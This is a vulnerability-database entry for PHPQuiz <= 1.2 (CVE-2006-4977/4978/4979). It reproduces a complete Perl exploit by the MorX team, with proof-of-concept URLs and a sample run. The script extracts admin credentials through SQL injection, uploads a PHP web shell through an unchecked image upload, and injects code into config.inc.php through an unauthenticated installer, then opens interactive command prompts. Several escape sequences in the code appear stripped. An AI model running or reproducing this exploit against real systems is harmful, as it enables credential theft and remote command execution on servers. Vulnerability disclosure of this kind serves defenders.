PHPQuiz Multiple Remote Vulnerabilites

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1053133 漏洞类型
发布时间 2006-09-26 更新时间 2006-09-26
CVE编号 CVE-2006-4979
CVE-2006-4978
CVE-2006-4977
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2006090154
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
######################################################

#

# Title: PHPQuiz <= v.1.2 Remote SQL injection/Code Execution Exploit

# Vendor  : PHPQuiz

# webiste : http://www.phpquiz.com

# Version : <= v.1.2

# Severity: Critical

# Author: Simo64 / simo64_at_morx_org

# MorX Security Reseach Team

# http://www.morx.org

# http://www.morx.org/phpquiz.txt

#

#   Details :

#

# SQL injection

#***************************

#

#   univers var in score.php and quiz_id var in home.php are not proprely verified and can be used to inject query

#

#   PoC : http://localhost/phpquiz/front/?what=score&univers=[SQL]

#		  http://localhost/phpquiz/front/?quiz=quiz&univers=1&step=1&quiz_id=[SQL]

#

# Arbitary File Upload

#**********************

# vulnerable code in back/upload_img.php and admin/upload_img.php near lines 74-76

#

#  74  if (($upload) && ($ok_update == "yes")) {

#  75

#  76  if(@copy($image, $path)){

#  77  .....

#

# $upload , $ok_update , $image , $path variables are not sanitized and can be used to upload files

#

#  PoC Exploit :

#

#  <form enctype="multipart/form-data" method="post" action="http://localhost/phpquiz/back/upload_img.php?upload=1&ok_update=
yes&path=./../img_quiz/l3ez.php">

#  Download File<br>

#  <input name="image" type="file" size="20"><br>

#  <input type="submit" name="upload" value="Upload"><form>

#

#  phpquiz/img_quiz/ folder is by defaut writable so after uploading a simple phpshell <?passthru($cmd);?>

#

#  we can lanche cmd from : http://localhost/phpquiz/img_quiz/l3ez.php?cmd=ls

#

# PHP Code Injection

#********************

#

# cfgphpquiz/install.php is accessible without authentification , the script is used to

# save configuration setting in config.inc.php.

#

# Impact:

# any remote user can post php code to the vulnerable file, view current configuration which contains sensitive information

# such as admin password (plain text) and login

#

#***********************************************************************
************

#

# simo64@localhost:~$ phpquiz.pl morx.org /phpquiz/ 1

#

# /-----------------------------------------------------------# | PHPQuiz v.1.2 Remote SQL injection/Code Execution Exploit |

# |            Coded by simo64 - simo64_morx.org              |

# |                      www.morx.org                         |

# |-----------------------------------------------------------|

# |       MorX Security Research Team &copy;                       |

# -----------------------------------------------------------/

#

# Connecting to www.morx.org ...      Connected !

#

# [+] Injecting credentials

#

# Sending Data ...

#

# SQL injection Succeded !

#

#         User EMail  : admin (at) morx (dot) org [email concealed]

#         User Login  : admin

#         User Passwd : password

#

# [+] Exec CMD by uploading a shell       Connected !

#

# Uploading shell ...     [OK]

#

# Checking if successfully Uploaded ....  [OK]

#

#                 NOW YOU CAN LAUNCH COMMANDS

#

# simo64[at]morx.org :~$ id

# uid=48(apache) gid=48(apache) groups=48(apache),2522(psaserv)

# simo64[at]morx.org :~$ pwd

# /home/morx/public_html/phpquiz/img_quiz

# simo64[at]morx.org :~$ ls

# id_1.gif

# id_2.gif

# id_3.gif

# id_4.gif

# index.php

# zaz.php

# simo64[at]morx.org :~$ exit

#

#!/usr/bin/perl

use IO::Socket ;

use LWP::Simple ;

print q(

/-----------------------------------------------------------| PHPQuiz v.1.2 Remote SQL injection/Code Execution Exploit |

|            Coded by simo64 - simo64_morx.org              |

|                      www.morx.org                         |

|-----------------------------------------------------------|

|                MorX Security Research Team &copy;              |

-----------------------------------------------------------/

);

sub usage(){

print "nUsage   :perl $0 siteurl /path/ useridn";

print "nExemple : perl $0 phpquiz.com /phpquiz/ 1n";

}

if(!@ARGV){

&usage();

exit(0)

}

$host = $ARGV[0];

$path = $ARGV[1];

$uid  = $ARGV[2];

$success = null ;

$injected = 0;

$injcheck = $path."cfgphpquiz/config.inc.php?xD=l3fou";

$phpinject = $path."cfgphpquiz/install.php?submit=Valider&config_alert_email_name=%22
;echo%20@$xD;@system($morx);//MorX%20RulZ%20=)";

$injectuser = "front/?what=score&univers=-64%20UNION%20SELECT%20null,LOGIN,null,null,n
ull,null,null,null,null,null%20FROM%20user%20WHERE%20ID=$uid/*";

$injectpass = "front/?what=score&univers=-64%20UNION%20SELECT%20null,PWD,null,null,nul
l,null,null,null,null,null%20FROM%20user%20WHERE%20ID=$uid/*";

$injectmail = "front/?what=score&univers=-64%20UNION%20SELECT%20null,EMAIL,null,null,n
ull,null,null,null,null,null%20FROM%20user%20WHERE%20ID=$uid/*";

syswrite STDOUT , "Connecting to $host ...";

my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

die "nnUnable to connect to $host " unless($sock) ;

syswrite STDOUT , "tConnected !nn[+] Injecting credentialsnnSending Data ...";

print $sock "GET $path$injectmail HTTP/1.1n";

print $sock "Host: $hostn";

print $sock "Connection: Closenn";

while($res = <$sock>){

if($res =~ /anim_fleche_droite.gif" border="0">"(.*?)"</a>/){

$usermail = $1 ;

$success = "ok" ;

}

}

if($success eq "ok") {

syswrite STDOUT , "nnSQL injection Succeded !nn";

sleep 2 ;

syswrite STDOUT , "tUser EMail  : $usermailn";

my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

print $sock "GET $path$injectuser HTTP/1.1n";

print $sock "Host: $hostn";

print $sock "Connection: Closenn";

while($res = <$sock>){

if($res =~ />"(.*?)"/){

$userlogin = $1 ;

}

}

syswrite STDOUT , "tUser Login  : $userloginn";

my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

print $sock "GET $path$injectpass HTTP/1.1n";

print $sock "Host: $hostn";

print $sock "Connection: Closenn";

while($res = <$sock>){

if($res =~ />"(.*?)"/){

$userpass = $1 ;

}

}

syswrite STDOUT , "tUser Passwd : $userpassnn";

} else {print "nnInjecting credentials Exploit Failed !nn";}

sleep 2;

# PART2 Remote Command Execution by uploaing shell

syswrite STDOUT , "n[+] Exec CMD by uploading a shell";

my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

die "nnUnable to connect to $host " unless($sock) ;

syswrite STDOUT , "tConnected !nn";

syswrite STDOUT , "Uploading shell ...";

$data='-----------------------------7d61592213049c

Content-Disposition: form-data; name="dir"

/

-----------------------------7d61592213049c

Content-Disposition: form-data; name="image"; filename="zaz.php"

Content-Type: text/plain

<?php

if (get_magic_quotes_gpc()){$_GET['cmd']=stripslashes($_GET['cmd']);}

passthru($_GET['cmd']);

?>

-----------------------------7d61592213049c

Content-Disposition: form-data; name="submit"

Upload

-----------------------------7d61592213049c--

';

$script = $path."/back/upload_img.php?upload=1&ok_update=yes&path=./../img_quiz/za
z.php";

$len = length $data ;

print $sock "POST $script HTTP/1.0rn";

print $sock "Content-Type: multipart/form-data; boundary=---------------------------7d61592213049crn";

print $sock "Host: $hostrn";

print $sock "Content-Length: $lenrn";

print $sock "Connection: closernrn";

print $sock $data;

syswrite STDOUT , "t[OK]nnChecking if successfully Uploaded .... ";

my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

print $sock "HEAD $path"."img_quiz/zaz.php  HTTP/1.0rn";

print $sock "Host: $hostrn";

print $sock "Connection: closenn";

while($rep = <$sock>){

if($rep =~ /HTTP/1.1 200 OK/) { $success = 1; }

}

if($success == 1){

print "t[OK]nnttNOW YOU CAN LAUNCH COMMANDSnn";

while(){

print "simo64[at]morx.org :~$ ";

chop($cmd=<STDIN>);

exit() if ($cmd eq 'exit');

$result = get("http://$host".$path."img_quiz/zaz.php?cmd=$cmd");

print $result;

}

}

else { print "tFailed !nnFile Upload Failednn" }

# STEP 3 Injecting PHPcode into config.inc.php file

print "n[+] Injecting PHP Code......nnConnecting ....";

my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

die "Connot Connect to $host !" unless($sock);

print "tConnected !nnSending Data ....t";

print $sock "GET $phpinject HTTP/1.1n";

print $sock "Host: $hostn";

print $sock "Content-Type: application/x-www-form-urlencodedn";

print $sock "User-Agent: MorX-Zillan";

print $sock "Connection: Closenn";

print "t OKnnChecking if code injected ...";

my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

print $sock "GET $injcheck HTTP/1.1n";

print $sock "Host: $hostn";

print $sock "Content-Type: application/x-www-form-urlencodedn";

print $sock "User-Agent: MorX-Zillan";

print $sock "Connection: Closenn";

while($check = <$sock>){

if($check =~ /l3fou/) { $injected = 1; }

}

if($injected == 1 ){

print "tSucceded !nntNOW YOU ARE IN !nn";

while(){

print "simo@morx.org :~$ ";

$cmd = <STDIN>;

chop($cmd);

exit(0) if($cmd eq "exit");

$result = get("http://".$host.$path."cfgphpquiz/config.inc.php?morx=$cmd");

print $result;

}

}

else {print "tFailednnPHPCode Injection Failed !nn";}